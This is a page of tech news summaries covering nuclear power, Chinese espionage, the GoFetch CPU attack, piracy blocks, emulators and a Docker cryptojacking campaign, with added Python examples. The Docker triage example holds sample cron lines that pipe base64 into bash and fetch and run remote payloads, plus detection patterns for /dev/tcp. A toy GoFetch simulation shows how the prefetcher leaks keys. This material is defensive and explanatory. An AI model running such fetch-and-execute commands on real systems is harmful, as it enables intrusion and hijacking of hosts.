Power

Michigan Nuclear Plant Aims To Be First Ever To Reopen In US (canarymedia.com) 109

The Palisades Nuclear Plant in Michigan has won a $1.5 billion conditional federal loan to reopen after being closed for decommissioning in 2022. Canary Media reports: If the loan is granted (subject to Holtec meeting closing conditions) and the 800-megawatt reactor located on Lake Michigan is repowered, it would be the first nuclear plant in the U.S. to reopen after being closed for decommissioning. Surprisingly, it would be just the second or third reactor to restart in the history of global civil nuclear power, according to Mycle Schneider, lead author of the World Nuclear Industry Status Report 2023, in an interview with Bulletin of the Atomic Scientists.

Holtec purchased Palisades a month after it shut down with plans to mothball the site, but plans changed. Now the firm, which specializes in nuclear waste management and decommissioning (as opposed to rebuilding and operating nuclear plants), intends to revive the plant instead. Holtec plans to get the power plant restarted by the end of 2025, a breathtakingly aspirational target given nuclear's history of missing construction and cost targets. The Palisades plant was closed by utility Entergy in May 2022 due to financial issues after operating for more than a half-century. And while the plant had a strong operational performance record in recent years, it also has a sobering history of shutdowns due to failures of critical equipment, as well as broken fuel rods and fuel-spill incidents. The site was shut down for the final time a few days ahead of schedule due to concerns about the reliability of a key piece of equipment.

When it was operating at its peak, the plant provided more than 600 high-paying jobs, many unionized. If restarted, the plant could drive up to $363 million in regional economic impact, according to Michigan Governor Gretchen Whitmer, a Democrat. That's why Whitmer and a bipartisan coalition of lawmakers back resurrecting the retired reactor. Local business owners and residents are "largely supportive" of the plan as well, according to local news site MLive. The state's 2024 budget devotes $150 million to the project. Still, the revival of the dormant Palisades faces its share of headwinds.

Security

Chinese Spies Sell Access into Top US, UK Networks (theregister.com) 16

An anonymous reader shared this report from The Register: Chinese spies exploited a couple of critical-severity bugs in F5 and ConnectWise equipment earlier this year to sell access to compromised U.S. defense organizations, UK government agencies, and hundreds of other entities, according to Mandiant.

The Google-owned threat hunters said they assess, "with moderate confidence," that a crew they track as UNC5174 was behind the exploitation of CVE-2023-46747, a 9.8-out-of-10-CVSS-rated remote code execution bug in the F5 BIG-IP Traffic Management User Interface, and CVE-2024-1709, a path traversal flaw in ConnectWise ScreenConnect that scored a perfect 10 out of 10 CVSS severity rating.

UNC5174 uses the online persona Uteus, and has bragged about its links to China's Ministry of State Security (MSS) — boasts that may well be true. The gang focuses on gaining initial access into victim organizations and then reselling access to valuable targets... Just last month, Mandiant noticed the same combination of tools, believed to be unique to this particular Chinese gang, being used to exploit the ConnectWise flaw and compromise "hundreds" of entities, mostly in the U.S. and Canada. Also between October 2023 and February 2024, UNC5174 exploited CVE-2023-22518 in Atlassian Confluence, CVE-2022-0185 in Linux kernels, and CVE-2022-3052, a Zyxel Firewall OS command injection vulnerability, according to Mandiant.

These campaigns included "extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions," the threat intel team noted.

More details from The Record. "One of the strangest things the researchers found was that UNC5174 would create backdoors into compromised systems and then patch the vulnerability they used to break in. Mandiant said it believes this was an 'attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance.'"

Security

New 'GoFetch' Apple CPU Attack Exposes Crypto Keys (securityweek.com) 40

"There is a new side channel attack against Apple 'M' series CPUs that does not appear to be fixable without a major performance hit," writes Slashdot reader EncryptedSoldier. SecurityWeek reports: A team of researchers representing several universities in the United States has disclosed the details of a new side-channel attack method that can be used to extract secret encryption keys from systems powered by Apple CPUs. The attack method, dubbed GoFetch, has been described as a microarchitectural side-channel attack that allows the extraction of secret keys from constant-time cryptographic implementations. These types of attacks require local access to the targeted system. The attack targets a hardware optimization named data memory-dependent prefetcher (DMP), which attempts to prefetch addresses found in the contents of program memory to improve performance.

The researchers have found a way to use specially crafted cryptographic operation inputs that allow them to infer secret keys, guessing them bits at a time by monitoring the behavior of the DMP. They managed to demonstrate end-to-end key extraction attacks against several crypto implementations, including OpenSSL Diffie-Hellman Key Exchange, Go RSA, and the post-quantum CRYSTALS-Kyber and CRYSTALS-Dilithium. The researchers have conducted successful GoFetch attacks against systems powered by Apple M1 processors, and they have found evidence that the attack could also work against M2 and M3 processors. They have also tested an Intel processor that uses DMP, but found that it's 'more robust' against such attacks.

The experts said Apple is investigating the issue, but fully addressing it does not seem trivial. The researchers have proposed several countermeasures, but they involve hardware changes that are not easy to implement or mitigations that can have a significant impact on performance. Apple told SecurityWeek that it thanks the researchers for their collaboration as this work advances the company's understanding of these types of threats. The tech giant also shared a link to a developer page that outlines one of the mitigations mentioned by the researchers.
The researchers have published a paper (PDF) detailing their work.
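To make the mechanism concrete, here is an added toy simulation (not the researchers' code and not Apple's microarchitecture). It models the three ingredients the attack needs: a prefetcher that treats any stored value inside a known "heap" address window as a pointer and pulls that line into the cache, an attacker who can flush a cache line and later probe whether it is present, and a victim step that is constant-time in the classical sense (no secret-dependent branch or array index) yet writes a secret-dependent value to memory. The address window, the 48-bit value width, the multiply-by-(1+bit) step, and the attacker's ability to drive the victim one key bit at a time are all modelling assumptions; real targets are modular arithmetic inside a cipher, and the attacker chooses inputs that make the intermediate pointer-like only for one value of the bit. The same model shows why blinding the intermediate with a random mask (one of the software countermeasures the researchers describe) defeats the prefetcher, and why disabling data-dependent prefetching does too.

```python
"""Toy model of how a data memory-dependent prefetcher (DMP) leaks a 'constant-time' secret.

Constructed simulation, not the GoFetch authors' code and not Apple's microarchitecture.
Assumptions: a DMP that scans values the victim just wrote to memory and prefetches any
value inside a known 'heap' address window; an attacker who can flush and probe cache
lines; and a victim operation whose output value, but not its timing, depends on the
key bit. The window, the 48-bit value width and the multiply-by-(1+bit) step are all
modelling choices made for this example.
"""
import random

CACHE_LINE = 64
HEAP_BASE = 0x1_0000_0000        # assumed window of "pointer-looking" values
HEAP_SIZE = 0x10_0000
MASK48 = (1 << 48) - 1           # assumed width of the value the victim stores


class Cache:
    """Set of cached line numbers; the attacker can flush a line and later probe it."""

    def __init__(self):
        self.lines = set()

    def touch(self, addr):
        self.lines.add(addr // CACHE_LINE)

    def flush(self, addr):
        self.lines.discard(addr // CACHE_LINE)

    def is_cached(self, addr):
        return addr // CACHE_LINE in self.lines


def looks_like_pointer(value):
    return HEAP_BASE <= value < HEAP_BASE + HEAP_SIZE


class DMP:
    """After a store, prefetch anything in the stored data that looks like a pointer."""

    def __init__(self, cache, enabled=True):
        self.cache = cache
        self.enabled = enabled   # False models a mode where data-dependent prefetching is off

    def observe(self, memory_words):
        if not self.enabled:
            return
        for word in memory_words:
            if looks_like_pointer(word):
                self.cache.touch(word)   # the leak: a data value was treated as an address


def victim_step(secret_bit, attacker_input, dmp, rng=None):
    """One step of a constant-time computation: no secret-dependent branch or index, but
    the value written to memory depends on the secret bit. Multiplying by (1 + bit) stands
    in for key-dependent arithmetic. If rng is given, the intermediate is blinded with a
    random mask before it is stored and unblinded afterwards (software countermeasure)."""
    intermediate = (attacker_input * (1 + secret_bit)) & MASK48
    mask = rng.getrandbits(48) if rng is not None else 0
    scratch = [intermediate ^ mask]      # the victim's memory the DMP gets to scan
    dmp.observe(scratch)
    return scratch[0] ^ mask             # the correct result either way


def recover_secret(secret_bits, dmp, cache, blind=False, seed=0):
    """Attacker: pick an input that is pointer-like when multiplied by 1 but not by 2,
    flush the probe line, let the victim run one step, then check whether the DMP
    brought the probe line back into the cache."""
    probe = HEAP_BASE + 0x1000
    assert looks_like_pointer(probe) and not looks_like_pointer(probe * 2)
    rng = random.Random(seed) if blind else None
    guesses = []
    for bit in secret_bits:
        cache.flush(probe)
        victim_step(bit, probe, dmp, rng)
        guesses.append(0 if cache.is_cached(probe) else 1)
    return guesses


def run(secret_bits, dmp_enabled=True, blind=False):
    """Run the attack against a fresh cache/DMP; returns the attacker's guessed bits."""
    cache = Cache()
    dmp = DMP(cache, enabled=dmp_enabled)
    return recover_secret(secret_bits, dmp, cache, blind=blind)


if __name__ == "__main__":
    secret = [1, 0, 1, 1, 0, 0, 1, 0]
    print("DMP on, no blinding :", run(secret))                     # recovers the secret
    print("DMP on, blinding    :", run(secret, blind=True))         # probe never prefetched
    print("DMP off             :", run(secret, dmp_enabled=False))  # probe never prefetched
```

The point the simulation makes is that classical constant-time discipline (no secret-dependent control flow or memory addressing) is not enough when the hardware itself turns data into addresses: the victim's timing is identical for both bit values, and the leak comes entirely from what the prefetcher does with the stored value.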

Ars Technica's Dan Goodin also reported on the vulnerability.

Piracy

Dutch Court Orders ISP To Block 'Anna's Archive' and 'LibGen' (torrentfreak.com) 26

The Dutch pirate site blocklist has expanded with two new targets, shadow libraries Anna's Archive and Library Genesis. The court order was obtained by local anti-piracy group BREIN, acting on behalf of major publishers. Interestingly, Z-Library isn't listed in the blocking order, despite explicit warnings previously issued by BREIN. TorrentFreak reports: All blocking requests were submitted by local anti-piracy group BREIN, which acts on behalf of rightsholders. These include the major Hollywood studios but BREIN's purview is much broader. Last week, it obtained the latest blocking order, this time on behalf of the publishing industry. Issued by the Rotterdam District Court, the order requires a local Internet provider to block two well-known shadow libraries; "Anna's Archive" and "Library Genesis" (LibGen). News of this new court order was shared by BREIN which notes that both sites were found to make copyright infringing works available on a large scale. At the time of writing, a published copy is not available but, based on the covenant, all large Internet providers are expected to implement the blockades. "These types of illegal shadow libraries are very harmful. The only ones who benefit are the anonymous owners of these illegal services. Authors and publishers see no return on their efforts and investments," BREIN comments. "Copyright holders deserve an honest living. There are numerous legal ways to obtain ebooks. If desired, this can also be done very cheaply; through the library for example."

The Rotterdam court issued a so-called 'dynamic' blocking order, meaning that rightsholders can update the targeted domains and IP addresses if the sites switch to new ones in the future. This also applies to mirrors and increases the blockades' effectiveness, as there is no need to return to court. Previously, Internet provider KPN challenged these 'dynamic' orders, suggesting that they are too broad. The court rejected this argument, however, noting that the process hasn't led to any major problems thus far. BREIN further reports that Google is voluntarily offering a helping hand. As reported in detail previously, the search engine removes blocked domains from its local search results after being notified about an ISP blocking order. "The effectiveness of the blocking measure is increased because Google cooperates in combating these infringements and, at the request of BREIN, completely removes all references to websites that are blocked by order of the Dutch court from the search results," BREIN writes.

Emulation (Games)

How Nintendo's Destruction of Yuzu Is Rocking the Emulator World (theverge.com) 33

An anonymous reader quotes a report from The Verge: When Nintendo sued the developers of Yuzu out of existence on March 4th, it wasn't just an attack on the leading way to play Nintendo Switch games without a Switch. It was a warning to anyone building a video game emulator. Seven developers have now stepped away from projects, are shutting them down, or have left the emulation scene entirely. Of those that remain, many are circling the wagons, getting quieter and more careful, trying not to paint targets on their backs. Four developers declined to talk to The Verge, telling me they didn't want to draw attention. One even tried to delete answers to my questions after we'd begun, suddenly scared of attracting press.

Not everyone is so afraid. Four other emulator teams tell me they're optimistic Nintendo won't challenge them, that they're on strong legal footing, and that Yuzu may have been an unusually incriminating case. One decade-long veteran tells me everyone's just a bit more worried. But when I point out that Nintendo didn't have to prove a thing in court, they all admit they don't have money for lawyers. They say they'd probably be forced to roll over, like Yuzu, if the Japanese gaming giant came knocking. "I would do what I'd have to do," the most confident of the four tells me. "I would want to fight it... but at the same time, I know we exist because we don't antagonize Nintendo."

There's a new meme where Yuzu is the mythical Hydra: cut off one head, and two more take its place. It's partly true in how multiple forks of Yuzu (and 3DS emulator Citra) sprung up shortly after their predecessors died: Suyu, Sudachi, Lemonade, and Lime are a few of the public names. But they're not giving Nintendo the middle finger: they're treating Nintendo's lawsuit like a guidebook about how not to piss off the company. In its legal complaint, Nintendo claimed Yuzu was "facilitating piracy at a colossal scale," giving users "detailed instructions" on how to "get it running with unlawful copies of Nintendo Switch games," among other things. Okay, no more guides, say the Switch emulator developers who spoke to me. They also say they're stripping out some parts of Yuzu that made it easier to play pirated games. As Ars Technica reported, a forked version called Suyu will require you to bring the firmware, title.keys, and prod.keys from your Switch before you can decrypt and play Nintendo games. Only one of those was technically required before. (Never mind that most people don't have an easily hackable first-gen Switch and would likely download these things off the net.) The developer of another fork tells me he plans to do something similar, making users "fend for yourself" by making sure the code doesn't auto-generate any keys.

Most developers I spoke to are also trying to make it clear they aren't profiting at Nintendo's expense. One who initially locked early access builds behind a donation page has stopped doing that, making them publicly available on GitHub instead. The leader of another project tells me nothing will ever be paywalled, and for now, there's "strictly no donation," either. When I ask about the Dolphin Emulator, which faced a minor challenge from Nintendo last year, I'm told it publicly exposes its tiny nonprofit budget for anyone to scrutinize. But I don't know that these steps are enough to prevent Nintendo from throwing around its weight again, particularly when it comes to emulating the Nintendo Switch, its primary moneymaker.

Since Yuzu's shutdown, a slew of other emulators have left the scene. They include (as highlighted by The Verge):

- The Citra emulator for Nintendo 3DS is gone
- The Pizza Boy emulators for Nintendo Game Boy Advance and Game Boy Color are gone
- The Drastic emulator for Nintendo DS is free for now and will be removed
- The lead developer of Yuzu and Citra has stepped away from emulation
- The lead developer of Strato, a Switch emulator, has stepped away from emulation
- Dynarmic, used to speed up various emulators including Yuzu, has abruptly ended development
- One contributor on Ryujinx, a Switch emulator, has stepped away from the project
- AetherSX2, a PS2 emulator, is finally gone (mostly unrelated; development was suspended a year ago)

Security

Misconfigured Cloud Servers Targeted with Linux Malware for New Cryptojacking Campaign (cadosecurity.com) 16

Researchers at Cado Security Labs received an alert about a honeypot using the Docker Engine API. "A Docker command was received..." they write, "that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server's root directory..." Typically, this is exploited to write out a job for the Cron scheduler to execute... In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker's Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server... To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh

"Multiple user mode rootkits are deployed to hide malicious processes," they note. And one of the shell scripts "makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker's session from being appended to the history file... Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn't appear in the shell history once a new session has been spawned."

The same script also inserts "an attacker-controlled SSH key to maintain access to the compromised host," according to the article, retrieves a miner for the Monero cryptocurrency and then "registers persistence in the form of systemd services" for both the miner and an open source Golang reverse shell utility named Platypus.

It also delivers "various utilities," according to SecurityWeek, "including 'masscan' for host discovery." Citing Cado's researchers, they write that the shell script also "weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents." The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet... ["For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," the researchers write.]

"This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers," Cado notes. "It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments."
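For anyone triaging a host that exposed its Docker Engine API, the two artefacts worth checking first are the ones the campaign above leaves behind: a container whose bind mount hands it the host's root filesystem, and cron entries that decode base64 into a shell, call the dropped vurl helper, open /dev/tcp, or fetch a stage with Python's urllib. The following is an added example (not Cado Security's code) that runs those checks over `docker inspect` output and crontab text; the inspect JSON and cron lines are constructed sample data, and 203.0.113.10 is a documentation address.

```python
"""Triage helpers for the Docker Engine API cryptojacking tradecraft described above.

Added example, not Cado Security's code. Checks two artefacts a responder would pull from
a suspect host: `docker inspect` output (is the host's root filesystem bind-mounted into a
container?) and cron entries (base64 piped into a shell, the dropped 'vurl' helper,
/dev/tcp fetches, or a Python urllib download). All sample data below is constructed.
"""
import json
import re

# Host paths that, bind-mounted into a container, effectively give the container root on the host.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/usr/bin", "/var/spool/cron", "/etc/cron.d"}

# Patterns drawn from the campaign description above.
CRON_PATTERNS = {
    "base64_to_shell": re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba)?sh\b"),
    "vurl_helper": re.compile(r"(?:^|[\s/])vurl(?:\s|$)"),
    "dev_tcp": re.compile(r"/dev/tcp/"),
    "python_urllib_fetch": re.compile(r"python[0-9.]*\s+-c\s+.*\burllib2?\b"),
}


def host_root_bind_mounts(inspect_json):
    """Return [(container, host_source, container_dest)] for bind mounts of sensitive host paths.

    inspect_json is the JSON array printed by `docker inspect <id>...`."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "?").lstrip("/")
        for mount in container.get("Mounts", []):
            if mount.get("Type") != "bind":
                continue
            src = (mount.get("Source") or "").rstrip("/") or "/"   # normalise "/" and "/etc/"
            if src in SENSITIVE_HOST_PATHS:
                findings.append((name, src, mount.get("Destination", "")))
    return findings


def suspicious_cron_lines(cron_text):
    """Return [(line_no, rule, line)] for non-comment cron lines matching any pattern."""
    hits = []
    for n, raw in enumerate(cron_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for rule, pattern in CRON_PATTERNS.items():
            if pattern.search(line):
                hits.append((n, rule, line))
    return hits


# Constructed `docker inspect` output: one benign container, one with the host root mounted.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web-proxy",
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
                 "Destination": "/data"}]},
    {"Name": "/sleepy_hopper",
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}]},
])

# Constructed crontab: one legitimate job, three shaped like the campaign's persistence.
SAMPLE_CRON = """\
# m h dom mon dow  command
0 3 * * * /usr/local/bin/backup.sh
* * * * * echo ZWNobyBoaQo= | base64 -d | bash
*/5 * * * * /usr/bin/vurl http://203.0.113.10/payload.sh | sh
* * * * * python -c 'import urllib2;exec(urllib2.urlopen("http://203.0.113.10/t.sh").read())'
"""

if __name__ == "__main__":
    for finding in host_root_bind_mounts(SAMPLE_INSPECT):
        print("host path exposed to container:", finding)
    for n, rule, line in suspicious_cron_lines(SAMPLE_CRON):
        print(f"cron line {n} [{rule}]: {line}")
```

A bind mount of the host root is not malicious on its own (backup and monitoring agents do it deliberately), so the mount check is a starting point for review rather than a verdict; the cron patterns are far more specific, and a hit on the vurl helper or a base64-to-shell pipe on a machine that also has an unexpected authorized_keys entry or new systemd units is the combination the campaign description points at.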

Security

Linux Variants of Bifrost Trojan Evade Detection via Typosquatting (darkreading.com) 19

"A 20-year-old Trojan resurfaced recently," reports Dark Reading, "with new variants that target Linux and impersonate a trusted hosted domain to evade detection." Researchers from Palo Alto Networks spotted a new Linux variant of the Bifrost (aka Bifrose) malware that uses a deceptive practice known as typosquatting to mimic a legitimate VMware domain, which allows the malware to fly under the radar. Bifrost is a remote access Trojan (RAT) that's been active since 2004 and gathers sensitive information, such as hostname and IP address, from a compromised system.

There has been a worrying spike in Bifrost Linux variants during the past few months: Palo Alto Networks has detected more than 100 instances of Bifrost samples, which "raises concerns among security experts and organizations," researchers Anmol Murya and Siddharth Sharma wrote in the company's newly published findings.

Moreover, there is evidence that cyberattackers aim to expand Bifrost's attack surface even further, using a malicious IP address associated with a Linux variant hosting an ARM version of Bifrost as well, they said... "As ARM-based devices become more common, cybercriminals will likely change their tactics to include ARM-based malware, making their attacks stronger and able to reach more targets."
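The typosquatting the report describes is detectable on the wire: a C2 name built to pass as a vendor host is, by construction, one or two edits away from the brand it imitates. The following is an added example (not Palo Alto Networks' code) that classifies DNS queries by comparing the registrable domain's label against a trusted allowlist using edit distance with adjacent transpositions, and also flags the same label under a different TLD. The trusted list and log lines are constructed, and the lookalike names use the reserved .example TLD rather than any real attacker domain.

```python
"""Lookalike-domain detection for the typosquatting technique described above.

Added example, not Palo Alto Networks' code. Flags DNS queries whose registrable domain
sits a small edit distance from a trusted brand domain (a dropped or swapped letter, an
adjacent transposition, or the same label under another TLD). The trusted list and the
log lines are constructed; lookalike names use the reserved .example TLD.
"""
import re

TRUSTED = {"vmware.com", "microsoft.com"}   # assumed allowlist for this example
MAX_DISTANCE = 2                             # edits at which a label still "reads as" the brand
QUERY = re.compile(r"query=(?P<qname>\S+)")  # field layout of the constructed log lines


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def registrable(qname):
    """Naive eTLD+1 (last two labels). A real deployment should consult the Public Suffix List."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(qname):
    """Return (verdict, closest_trusted, distance); verdict is trusted/tld_swap/lookalike/unknown."""
    reg = registrable(qname)
    if reg in TRUSTED:
        return ("trusted", reg, 0)
    if "." not in reg:
        return ("unknown", None, None)
    label = reg.split(".", 1)[0]
    closest, dist = min(((t, osa_distance(label, t.split(".", 1)[0])) for t in sorted(TRUSTED)),
                        key=lambda pair: pair[1])
    if dist == 0:
        return ("tld_swap", closest, 0)        # same brand label, different TLD
    if dist <= MAX_DISTANCE:
        return ("lookalike", closest, dist)
    return ("unknown", None, dist)


def scan_log(text):
    """Return [(qname, verdict, closest_trusted, distance)] for queries worth a second look."""
    hits = []
    for line in text.splitlines():
        m = QUERY.search(line)
        if not m:
            continue
        verdict, closest, dist = classify(m.group("qname"))
        if verdict in ("lookalike", "tld_swap"):
            hits.append((m.group("qname"), verdict, closest, dist))
    return hits


# Constructed resolver log lines (not real traffic).
SAMPLE_LOG = """\
2024-03-21T10:00:01Z client=10.0.0.5 query=updates.vmware.com type=A
2024-03-21T10:00:02Z client=10.0.0.5 query=download.vmwre.example type=A
2024-03-21T10:00:03Z client=10.0.0.7 query=login.micorsoft.example type=A
2024-03-21T10:00:04Z client=10.0.0.9 query=vmware.example type=A
2024-03-21T10:00:05Z client=10.0.0.9 query=example.org type=A
"""

if __name__ == "__main__":
    for qname, verdict, closest, dist in scan_log(SAMPLE_LOG):
        print(f"{verdict:9} {qname:28} ~ {closest} (distance {dist})")
```

Two caveats a practitioner would add: edit distance does not catch homoglyphs (a Cyrillic letter standing in for a Latin one) or brand-plus-keyword names such as a "vmware-update" label, so a production rule set pairs this with Unicode confusable mapping and substring matching; and any brand with many legitimate regional or product domains needs those in the allowlist first, or the detector will spend its day flagging the vendor's own hosts.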

Science

Company That Plans To Bring Back the Mammoth Takes a Key Step (arstechnica.com) 29

John Timmer reports via Ars Technica: A company called Colossal plans to pioneer the de-extinction business, taking species that have died within the past few thousand years and restoring them through the use of DNA editing and stem cells. It's grabbed headlines recently by announcing some compelling targets: the thylacine, an extinct marsupial predator, and an icon of human carelessness, the dodo. But the company was formed to tackle an even more audacious target: the mammoth, which hasn't roamed the Northern Hemisphere for thousands of years. Obviously, there are a host of ethical and conservation issues that would need to be worked out before Colossal's plans go forward. But there are some major practical hurdles as well, most of them the product of the distinct and extremely slow reproductive biology of the mammoth's closest living relatives, the elephants. At least one of those has now been cleared, as the company is announcing the production of the first elephant stem cells. The process turned out to be extremely difficult, suggesting that the company still has a long road ahead of it. [...] Overall, it's a project that has a high probability of failure and may ultimately require generations of scientists. If we do successfully de-extinct a species, the first example will probably be a different species, even though the projects launched later.

But Colossal is forging ahead and cleared one of the many hurdles it faces: It created the first induced stem cells from elephants and will be placing a draft manuscript describing the process on a public repository on Wednesday. (Colossal provided Ars with an advanced version of the draft that, outside of a few editing errors, appears largely complete.) Beyond providing the technical details of how the process works, the manuscript describes a long, failure-ridden route to eventual success. Several methods have been developed to allow us to induce stem cells from the cells of an adult organism. The original Nobel-winning process developed by Shinya Yamanaka involved inserting the genes that encode four key embryonic regulatory genes into adult cells and allowing them to reprogram the adult cell into an embryonic state. That has proven effective in a variety of species but has a couple of drawbacks due to the fact that the four genes can potentially stick around, interfering with later development steps. Although there are ways around that, others have developed a cocktail of chemicals that perform a similar function by activating signaling pathways that, collectively, can also reprogram adult cells. When it works, this simplifies matters, as you only have to remove the chemicals to allow the stem cells to adopt other fates. Colossal tried both of these. Neither worked with elephant cells: "Multiple attempts with current standard reprogramming methods were tried, and failed, and resulted in no, or incomplete, reprogramming." Apparently, lots of additional trial and error ensued. The eventual solution ended up being based in part on combining the two primary options: Cells were first exposed to a chemical reprogramming cocktail and then given the four genes used in the alternative reprogramming method. On its own, however, that wasn't enough. The researchers also had to address a quirk of elephant biology.

Obviously, for Colossal, this is a means to an end: the mammoth. But that's remarkably underplayed in the manuscript. Instead, its emphasis is on the technology's use in the conservation of existing species. [T]he researchers note that studying things like elephant development and metabolism in actual elephants is not especially realistic. But we can potentially induce the stem cells developed here into any cell we'd want to study -- nerve, liver, heart, and so on. So, the stem cells described here could be a useful tool for research. So, these cells are being presented as a valuable tool for the research community. Still, you can expect the people behind the de-extinction project to be getting to work on some of the easier things: showing that the genome in the cells can be edited and that they can be induced to start the process of embryogenesis. Separately, some unfortunate individuals will need to be working on the hard problems we mentioned earlier.

China

China Intensifies Push To 'Delete America' From Its Technology (wsj.com) 160

A directive known as Document 79 ramps up Beijing's effort to replace U.S. tech with homegrown alternatives. From a report: For American tech companies in China, the writing is on the wall. It's also on paper, in Document 79. The 2022 Chinese government directive expands a drive that is muscling U.S. technology out of the country -- an effort some refer to as "Delete A," for Delete America. Document 79 was so sensitive that high-ranking officials and executives were only shown the order and weren't allowed to make copies, people familiar with the matter said. It requires state-owned companies in finance, energy and other sectors to replace foreign software in their IT systems by 2027.

American tech giants had long thrived in China as they hot-wired the country's meteoric industrial rise with computers, operating systems and software. Chinese leaders want to sever that relationship, driven by a push for self-sufficiency and concerns over the country's long-term security. The first targets were hardware makers. Dell, International Business Machines and Cisco Systems have gradually seen much of their equipment replaced by products from Chinese competitors.

Document 79, named for the numbering on the paper, targets companies that provide the software -- enabling daily business operations from basic office tools to supply-chain management. The likes of Microsoft and Oracle are losing ground in the field, one of the last bastions of foreign tech profitability in the country. The effort is just one salvo in a yearslong push by Chinese leader Xi Jinping for self-sufficiency in everything from critical technology such as semiconductors and fighter jets to the production of grain and oilseeds. The broader strategy is to make China less dependent on the West for food, raw materials and energy, and instead focus on domestic supply chains.

NASA

Blue Origin Targets 2025 For Cargo Lander's Inaugural Moon Trip, With Humans To Follow (geekwire.com) 19

In an update on CBS' "60 Minutes" on Sunday, Blue Origin said it was aiming to send an uncrewed lander to the surface of the moon in the next 12 to 16 months. A crewed version is expected to follow. GeekWire reports: "We're expecting to land on the moon between 12 and 16 months from today," [said John Couluris, senior vice president for lunar permanence at Blue Origin]. "I understand I'm saying that publicly, but that's what our team is aiming towards." Couluris was referring to a pathfinder version of Blue Origin's nearly three-story-tall Blue Moon Mark 1 cargo lander, which is taking shape at Blue Origin's production facility in Huntsville, Ala. The Pathfinder Mission would demonstrate the MK1's capabilities -- including its hydrogen-fueled BE-7 engine, its precision landing system and its ability to deliver up to 3 tons of payload anywhere on the moon.

Blue Origin envisions building multiple cargo landers, as well as a crewed version of the Blue Moon lander that could transport NASA astronauts to and from the lunar surface. The MK1 cargo lander is designed for a single launch and delivery, but the crewed lander would be reusable. "We'll launch them to lunar orbit, and we'll leave them there," Couluris explained. "And we'll refuel them in orbit, so that multiple astronauts can use the same vehicle back and forth."

The Pathfinder Mission would be funded by Blue Origin, but NASA is providing support for other Blue Moon missions. Blue Origin's $3.4 billion contract with NASA calls for the crewed lander to be available for the Artemis 5 moon mission by 2029, with an uncrewed test flight as part of the buildup. The in-space refueling operation would make use of a cislunar transporter, built by Lockheed Martin, that could travel between low Earth orbit and lunar orbit with supplies. "We are now building with NASA the infrastructure to ensure lunar permanency," Couluris said. NASA is providing funding for the Blue Moon landing system as an alternative to SpaceX's Starship system, which is under development at SpaceX's Starbase in South Texas. The crewed Starship lunar lander is scheduled to come into play for Artemis 3, a milestone landing mission that's currently scheduled for 2026. [...]

Blue Origin plans to send the MK1 lander to the moon on its reusable New Glenn rocket, which is also under development. A couple of weeks ago, a pathfinder version of that rocket was raised on a Florida launch pad for the first time, and it's currently going through a series of cryogenic tanking tests. Blue Origin CEO Dave Limp, who was brought over to the company from Amazon last year to accelerate work on New Glenn, said in a LinkedIn post that he's "looking forward to bringing this heavy-lift capacity to our customers later this year." One of the early launches is tasked with sending a pair of NASA probes to Mars.

Government

How the Pentagon Learned To Use Targeted Ads To Find Its Targets (wired.com) 55

An anonymous reader quotes an excerpt from a Wired article: In 2019, a government contractor and technologist named Mike Yeagley began making the rounds in Washington, DC. He had a blunt warning for anyone in the country's national security establishment who would listen: The US government had a Grindr problem. A popular dating and hookup app, Grindr relied on the GPS capabilities of modern smartphones to connect potential partners in the same city, neighborhood, or even building. The app can show how far away a potential partner is in real time, down to the foot. But to Yeagley, Grindr was something else: one of the tens of thousands of carelessly designed mobile phone apps that leaked massive amounts of data into the opaque world of online advertisers. That data, Yeagley knew, was easily accessible by anyone with a little technical know-how. So Yeagley -- a technology consultant then in his late forties who had worked in and around government projects nearly his entire career -- made a PowerPoint presentation and went out to demonstrate precisely how that data was a serious national security risk.

